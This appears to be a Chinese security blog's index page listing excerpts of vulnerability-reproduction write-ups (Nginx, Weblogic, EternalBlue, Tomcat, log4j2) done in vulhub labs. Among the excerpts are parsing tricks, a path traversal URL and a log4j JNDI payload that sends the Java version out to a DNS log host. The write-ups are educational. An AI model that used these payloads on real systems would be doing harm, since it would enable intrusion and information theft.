
漏洞复现篇
文章平均质量分 83
复现有名的漏洞
不习惯有你
一个喜欢渗透的小伙子,正在成为大佬的路上
展开
-
Nginx 文件名逻辑漏洞(CVE-2013-4547)
nginx对上面的URI处理后将shell.jpg[20][00].php交给fastcgi处理,由于零截断fastcgi实际处理的文件为abc.jpg[20],这个文件需要存在fastcgi才能正常处理。在Windows环境下由于命名文件时不允许文件后缀末尾存在空格所以自动将其修复为abc.jpg,这种情况下我们只需要上传一张包含代码的名字为abc.jpg的文件就可以利用漏洞了。从而只会解析到前面的文件,以1.jpg\0.php为例,只会解析到1.jpg,假如这时里面存在木马,则可以直接代码执行。原创 2023-03-09 15:15:28 · 458 阅读 · 0 评论 -
Weblogic反序列化漏洞(CVE-2017-10271)
Path weblogic/CVE-2017-10271 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞的产生感觉都是由于过滤的不严谨,以后找漏洞我们可以注重没有过滤的地方,毕竟这么多的代码,总会有疏忽的地方。漏洞产生的原因是因为在调用,xml的时候没有做过滤,从而导致漏洞的产生。3.查看DNSLOG发现,存在访问,则漏洞存在。1.找到存在漏洞的页面。原创 2022-10-15 15:37:33 · 533 阅读 · 0 评论 -
docker容器加速
docker加速器,快速下载vulhub中的靶场转载 2022-10-04 00:35:45 · 1482 阅读 · 0 评论 -
nginx解析漏洞(nginx_parsing_vulnerability)
解析格式:1.jpg/.php、1.jpg/.php,1.jpg会被当成php格式解析nginx和iis7.x解析漏洞类似,都是加上/.php后文件以php格式解析。配置文件vim /etc/php5/fpm/php.ini、vim /etc/php5/fpm/pool.d/www.conf关键配置项: cgi.fix_pathinfo=1,security.limit_extensions=允许解析其他格式为php,则存在解析。1.jpg/.php -> 1.jpg会被当成php格式解析。原创 2022-09-27 12:30:16 · 1013 阅读 · 0 评论 -
Nginx 配置错误导致漏洞 (insecure-configuration)
说白了就是当url中匹配到 /files 的时候就自动替换为 /home/ ,假设我们url中是 /files../ 的话,那么 /files 首先替换为 /home/ 后面还有 ../ 则拼接上去,最后的结果就为 /home/../ c从而访问的是home的上一层目录,就是根目录。当我们点击里面的路径的时候,例如/home/文件夹,发现里面只有一个help.txt文件,并不是像我们主机里那么多的文件,其原因也很简单,因为我们没有权限访问。原创 2022-09-23 20:35:34 · 3153 阅读 · 0 评论 -
Nginx越界读取缓存漏洞(CVE-2017-7529)
在一个 Range 首部中,可以一次性请求多个部分,服务器会以 multipart 文件的形式将其返回。Nginx越界读取缓存漏洞(CVE-2017-7529)复现分析 漏洞概述 在 Nginx 的 range filter 中存在整数溢出漏洞,可以通过带有特殊构造的 range 的 HTTP 头的。主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取到缓存文件中比敏感的服务器信息。漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园。原创 2022-09-21 01:09:27 · 1940 阅读 · 0 评论 -
永恒之蓝漏洞复现(CVE-2017-0146)
前言永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。原理分析:利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞原创 2022-04-03 20:43:48 · 4884 阅读 · 0 评论 -
Tomcat文件包含漏洞(CVE-2020-1938)
Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件。漏洞造成的原因是由于ajp设计缺陷,我们可以通过修改Tomcat ajp协议的端口,也可直接考虑关闭ajp connectoy,来避免攻击者攻击。用的是python2。原创 2022-09-16 01:04:14 · 2670 阅读 · 0 评论 -
Tomcat任意文件上传漏洞(CVE-2017-12615)
访问222.jsp页面发现有内容(这里是Hello java的原因是我自己已经上传过一次,由于已经实操过一遍不想再次上传所以就用了第一次实操的222.jsp文件,还请见谅)验证成功,则当我们上传的内容是jsp的一句话那么我们就可以拿下这台服务器,这里由于是自己购买的服务器就不上传一句话木马了。总体来说这个漏洞复现起来还是比较简单的。Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615)原创 2022-09-15 00:30:55 · 1181 阅读 · 0 评论 -
复现log4j2漏洞(CVE-2021-44228)
接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}cd vulhub/log4j/CVE-2021-44228 进入目录里。docker-compoes up -d 开启环境。docker-compoes ps 查看对应的端口。可以看到端口在8983上,我们到服务器防火墙打开8983。出现java版本,则存在命令执行漏洞。原创 2022-09-13 14:51:42 · 1011 阅读 · 0 评论